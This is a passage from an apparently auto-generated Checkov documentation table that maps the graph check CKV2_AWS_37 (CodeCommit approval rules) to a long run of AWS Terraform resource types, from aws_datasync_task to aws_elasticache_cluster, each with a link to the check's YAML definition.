| Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 695 | CKV2_AWS_37 | resource | aws_datasync_task | Ensure CodeCommit 
associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 696 | CKV2_AWS_37 | resource | aws_dax_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 697 | CKV2_AWS_37 | resource | aws_dax_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 698 | CKV2_AWS_37 | resource | aws_dax_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 699 | CKV2_AWS_37 | resource | aws_db_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 700 | CKV2_AWS_37 | resource | aws_db_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 701 | CKV2_AWS_37 | resource | aws_db_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 702 | CKV2_AWS_37 | resource | 
aws_db_instance_role_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 703 | CKV2_AWS_37 | resource | aws_db_option_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 704 | CKV2_AWS_37 | resource | aws_db_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 705 | CKV2_AWS_37 | resource | aws_db_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 706 | CKV2_AWS_37 | resource | aws_db_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 707 | CKV2_AWS_37 | resource | aws_db_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 708 | CKV2_AWS_37 | resource | aws_default_network_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 709 
| CKV2_AWS_37 | resource | aws_default_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 710 | CKV2_AWS_37 | resource | aws_default_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 711 | CKV2_AWS_37 | resource | aws_default_subnet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 712 | CKV2_AWS_37 | resource | aws_default_vpc | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 713 | CKV2_AWS_37 | resource | aws_default_vpc_dhcp_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 714 | CKV2_AWS_37 | resource | aws_devicefarm_project | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 715 | CKV2_AWS_37 | resource | aws_directory_service_conditional_forwarder | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 716 | CKV2_AWS_37 | resource | aws_directory_service_directory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 717 | CKV2_AWS_37 | resource | aws_directory_service_log_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 718 | CKV2_AWS_37 | resource | aws_dlm_lifecycle_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 719 | CKV2_AWS_37 | resource | aws_dms_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 720 | CKV2_AWS_37 | resource | aws_dms_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 721 | CKV2_AWS_37 | resource | aws_dms_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 722 | CKV2_AWS_37 | resource | aws_dms_replication_instance | 
Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 723 | CKV2_AWS_37 | resource | aws_dms_replication_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 724 | CKV2_AWS_37 | resource | aws_dms_replication_task | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 725 | CKV2_AWS_37 | resource | aws_docdb_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 726 | CKV2_AWS_37 | resource | aws_docdb_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 727 | CKV2_AWS_37 | resource | aws_docdb_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 728 | CKV2_AWS_37 | resource | aws_docdb_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 
729 | CKV2_AWS_37 | resource | aws_docdb_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 730 | CKV2_AWS_37 | resource | aws_dx_bgp_peer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 731 | CKV2_AWS_37 | resource | aws_dx_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 732 | CKV2_AWS_37 | resource | aws_dx_connection_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 733 | CKV2_AWS_37 | resource | aws_dx_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 734 | CKV2_AWS_37 | resource | aws_dx_gateway_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 735 | CKV2_AWS_37 | resource | aws_dx_gateway_association_proposal | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 736 | CKV2_AWS_37 | resource | aws_dx_hosted_private_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 737 | CKV2_AWS_37 | resource | aws_dx_hosted_private_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 738 | CKV2_AWS_37 | resource | aws_dx_hosted_public_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 739 | CKV2_AWS_37 | resource | aws_dx_hosted_public_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 740 | CKV2_AWS_37 | resource | aws_dx_hosted_transit_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 741 | CKV2_AWS_37 | resource | aws_dx_hosted_transit_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 742 | CKV2_AWS_37 | resource | aws_dx_lag | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 743 | CKV2_AWS_37 | resource | aws_dx_private_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 744 | CKV2_AWS_37 | resource | aws_dx_public_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 745 | CKV2_AWS_37 | resource | aws_dx_transit_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 746 | CKV2_AWS_37 | resource | aws_dynamodb_global_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 747 | CKV2_AWS_37 | resource | aws_dynamodb_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 748 | CKV2_AWS_37 | resource | aws_dynamodb_table_item | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 749 | CKV2_AWS_37 | resource | aws_ebs_default_kms_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 750 | CKV2_AWS_37 | resource | aws_ebs_encryption_by_default | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 751 | CKV2_AWS_37 | resource | aws_ebs_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 752 | CKV2_AWS_37 | resource | aws_ebs_snapshot_copy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 753 | CKV2_AWS_37 | resource | aws_ebs_volume | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 754 | CKV2_AWS_37 | resource | aws_ec2_availability_zone_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 755 | CKV2_AWS_37 | resource | 
aws_ec2_capacity_reservation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 756 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_authorization_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 757 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 758 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_network_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 759 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 760 | CKV2_AWS_37 | resource | aws_ec2_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 761 | CKV2_AWS_37 | resource | aws_ec2_local_gateway_route | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 762 | CKV2_AWS_37 | resource | aws_ec2_local_gateway_route_table_vpc_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 763 | CKV2_AWS_37 | resource | aws_ec2_tag | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 764 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 765 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_filter_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 766 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_session | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 767 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 768 | CKV2_AWS_37 | resource | 
aws_ec2_transit_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 769 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_peering_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 770 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_peering_attachment_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 771 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 772 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 773 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 774 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table_propagation | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 775 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_vpc_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 776 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_vpc_attachment_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 777 | CKV2_AWS_37 | resource | aws_ecr_lifecycle_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 778 | CKV2_AWS_37 | resource | aws_ecr_repository | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 779 | CKV2_AWS_37 | resource | aws_ecr_repository_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 780 | CKV2_AWS_37 | resource | aws_ecs_capacity_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 781 | CKV2_AWS_37 | resource | 
aws_ecs_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 782 | CKV2_AWS_37 | resource | aws_ecs_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 783 | CKV2_AWS_37 | resource | aws_ecs_task_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 784 | CKV2_AWS_37 | resource | aws_efs_access_point | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 785 | CKV2_AWS_37 | resource | aws_efs_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 786 | CKV2_AWS_37 | resource | aws_efs_file_system_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 787 | CKV2_AWS_37 | resource | aws_efs_mount_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 788 | 
CKV2_AWS_37 | resource | aws_egress_only_internet_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 789 | CKV2_AWS_37 | resource | aws_eip | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 790 | CKV2_AWS_37 | resource | aws_eip_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 791 | CKV2_AWS_37 | resource | aws_eks_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 792 | CKV2_AWS_37 | resource | aws_eks_fargate_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 793 | CKV2_AWS_37 | resource | aws_eks_node_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 794 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_application | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 795 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_application_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 796 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_configuration_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 797 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_environment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 798 | CKV2_AWS_37 | resource | aws_elasticache_cluster | Ensure CodeCommit associates an approval rule | Terraform | 